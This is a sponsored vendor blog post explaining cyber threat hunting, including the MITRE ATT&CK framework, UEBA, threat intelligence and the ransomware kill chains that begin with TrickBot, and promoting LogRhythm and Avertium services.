Editor’s Note: This a partnered sponsored guest blog written by Avertium.
Cyber threat hunting is a proactive cybersecurity strategy that searches through networks to detect and isolate advanced threats before they present themselves. Threat hunters do not simply search for active threats. They are in search of hacker tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), indicators of attack (IOAs), and threats such as advanced persistent threats (APTs) evading your existing security system. Although threat hunters have a variety of strategies at their disposal, the best strategy is often determined by the type of threat they are hunting.
At its core, threat hunting is more than just detection and response. While threat detection focuses on identifying evidence of an attack such as correlated events or signature-based detection, threat hunting takes a more proactive approach to cybersecurity. Threat hunting is intended to counteract an adversary that is in the organization’s environment but has not yet shown any indicators of compromise.
In comparison, threat hunting uses threat indicators as a starting point or hypothesis for a quest. Virtual fingerprints left by malware or an attacker, a weird IP address, phishing emails, or other unexpected network traffic are all threat signs. In other words, threat hunting does not wait for IOCs to appear before seeking out security breaches.
Both threat detection and threat hunting are complementary approaches to identifying and responding to security threats. They are most effective when used in tandem. While threat detection provides vital defensive measures, threat hunting is the offensive playbook for outmaneuvering an enemy before they have the chance to act.
In a non-security setting, think about the following application. An effective criminal does research before staging a robbery. A bank that relies solely on threat detection is only alerted once IOCs are flagged when the criminal has already accessed the vault. A bank that also threat hunts would be continuously on alert for IOAs that would allow their security team to respond to suspicious activity before any plan is executed. A plotting bank robber would likely investigate security systems, walk around the premises, and note the layout of the bank and the location of the vault prior to returning to perform a heist. None of these IOAs may individually signal an imminent threat, but they give reason to monitor the individual when viewed together in context.
Effective threat hunters hypothesize the most likely tactics and attack chains by thinking like their enemies. That said, there is no one-size-fits-all tactical approach to threat hunting. Instead, effective threat hunters rely on an arsenal of effective tools, frameworks, and methodologies for hunting threats.
How do you stop a threat when you are not sure it even exists? You hunt for it. To be a successful threat hunter, you need to stay one step ahead of your adversaries. Then understand their perspective, form a hypothesis about the existence of a threat, theorize how to detect it, and then stop it. The MITRE ATT&CK framework is a great starting point for understanding attackers. It provides a catalog of real-world adversarial tactics and techniques.
Using the MITRE ATT&CK framework to inform your SIEM configuration, you can streamline threat hunting via:
The complexity and volume of cyber threats are evolving at a dangerously rapid pace. With the shortage of qualified analysts, inefficient manual processes, and the growing cost of securing a business, organizations of all sizes are exposed to countless risks.
Avertium’s Cyber Fusion Centers (CFCs) leverage artificial intelligence (AI) and machine learning (ML) and LogRhythm’s SOC analysts uses ML to stay ahead. The solution is to incorporate security technology that can automate tasks associated with threat detection, incident response, and administration with AI.
LogRhythm UEBA provides unparalleled accuracy by using ML to detect potential hidden threats and evolves in your environment. It combines supervised and unsupervised learning for continuous, automated tuning without requiring manual intervention. As a result, your security grows smarter over time.
Cyber threat intelligence (CTI) is a body of information regarding attempted or successful breaches that are gathered and evaluated by automated security systems that use machine learning and artificial intelligence. When used to your advantage, threat intelligence can help you hunt down your threats, shifting your security from a state of reactivity to prevention.
Basically, threat hunting begins where threat intelligence ends. Therefore, CTI plays an essential role in keeping your OpSec staff up-to-date on active threat actors and the latest TTPs likely to be used against your company.
Ariel Ropek, Avertium’s Director of Cyber Threat Intelligence, provides an example of a concrete case where the value of threat intelligence might look like this:
“The Conti and Ryuk ransomware kill chains both begin with TrickBot malware as the initial infection. Conti progresses to the PowerShell Empire toolset for persistence and command and control (C2), while Ryuk typically uses Cobalt Strike for C2 operations. If a threat hunter observed IOCs related to TrickBot malware in an environment, they could use this intelligence to expand their hunt to both PS Empire and Cobalt Strike IOCs. The result of those searches would indicate whether Conti or Ryuk was the likely adversary and inform incident response teams of appropriate next steps.”
Intelligence-driven threat hunting links malicious activity to known entities and gives threat hunters additional context about how far the kill chain has progressed as well as what the adversary is likely to do next.
Managed detection and response (MDR) is an outsourced managed security service that provides organizations with threat hunting services and responds to threats once they are discovered. It is yet another tool in the toolbox but is not all-inclusive.
Endpoint detection and response (EDR) is an automated and continuous system of monitoring user data for suspicious activity. It alerts security teams of anomalous user behavior to help identify and contain threats to their endpoint.
Threat hunting methodologies are separated into two types. Depending on the approach, they are either structured or unstructured hunting.
Structured threat hunting is based on indicators of attack and TTPs of an attacker. It leverages MITRE Adversary Tactics Techniques and Procedures and Common Knowledge (ATT&CK) framework using both PRE-ATT&CK and enterprise frameworks.
Unstructured hunting is based on a trigger. It uses available data to follow the path of any detected IOC.
The tactics, techniques, and procedures of bad actors are always evolving. Adaptive enemies call for adaptive security. A holistic, risk-based approach to cybersecurity layers services, technology capabilities, and tried-and-true security frameworks like MITRE ATT&CK with strategy and client collaboration to deliver a more resilient security posture. See the resources for additional help with your threat hunting planning.
Security strategies are evolving; driven by regulatory requirements, customer expectations around data privacy and AI-driven…
In our April 2024 quarterly release, LogRhythm Axon showcases new enhancements from its two week…
In our April 2024 quarterly release, LogRhythm SIEM introduces new enhancements to bring you faster…